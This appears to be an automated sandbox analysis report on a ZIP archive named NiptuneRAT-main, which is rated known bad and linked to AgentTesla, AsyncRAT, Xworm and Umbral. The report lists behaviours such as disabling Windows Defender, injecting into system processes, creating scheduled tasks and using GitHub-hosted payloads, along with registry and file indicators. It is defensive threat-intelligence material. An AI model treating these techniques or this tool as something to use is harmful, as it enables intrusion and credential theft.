Analysis Overview
SHA256
5b054b368eda8d148383e6a64d890b885d9a0b1898493e1008ffe1a531118b6b
Threat Level: Known bad
The file NiptuneRAT-main.zip was found to be: Known bad.
Malicious Activity Summary
Arrowrat family
Detect Umbral payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Async RAT payload
Detect Xworm Payload
Umbral family
AgentTesla
AgentTesla payload
Agenttesla family
Asyncrat family
Contains code to disable Windows Defender
AsyncRat
Xworm
Async RAT payload
AgentTesla payload
Grants admin privileges
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
Obfuscated with Agile.Net obfuscator
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in System32 directory
Launches sc.exe
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Delays execution with timeout.exe
Enumerates system info in registry
Modifies data under HKEY_USERS
Gathers system information
Suspicious use of SendNotifyMessage
Opens file in notepad (likely ransom note)
Suspicious use of SetWindowsHookEx
Enumerates processes with tasklist
Runs net.exe
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Gathers network information
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-17 21:41
Signatures
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Agenttesla family
Arrowrat family
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Asyncrat family
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral family
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-17 21:41
Reported
2024-03-17 21:52
Platform
win7-20240221-en
Max time kernel
359s
Max time network
364s
Command Line
Signatures
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-17 21:41
Reported
2024-03-17 21:52
Platform
win10-20240221-en
Max time kernel
314s
Max time network
394s
Command Line
Signatures
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.0.1.0.0.0.8.1.0.0.0.2.0.0.8.4.0.0.0.2.0.0.8.2.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-17 21:41
Reported
2024-03-17 21:52
Platform
win10v2004-20240226-en
Max time kernel
207s
Max time network
518s
Command Line
Signatures
AgentTesla
AsyncRat
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4936 created 620 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\$77NiptuneClient.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneBinder.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\$77NiptuneClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\$77.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4936 set thread context of 3728 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0\NodeSlot = "4" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = 0100000000000000ffffffff | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1 = 7e003100000000007158b6ad11004465736b746f7000680009000400efbe5a58c8707158b7ad2e0000007ce101000000010000000000000000003e00000000007d0937004400650073006b0074006f007000000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370036003900000016000000 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0 = 68003100000000007158bcad10004e495054554e7e310000500009000400efbe7158b6ad7158bdad2e00000066690100000005000000000000000000000000000000adaf97004e0069007000740075006e0065005200410054002d006d00610069006e00000018000000 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
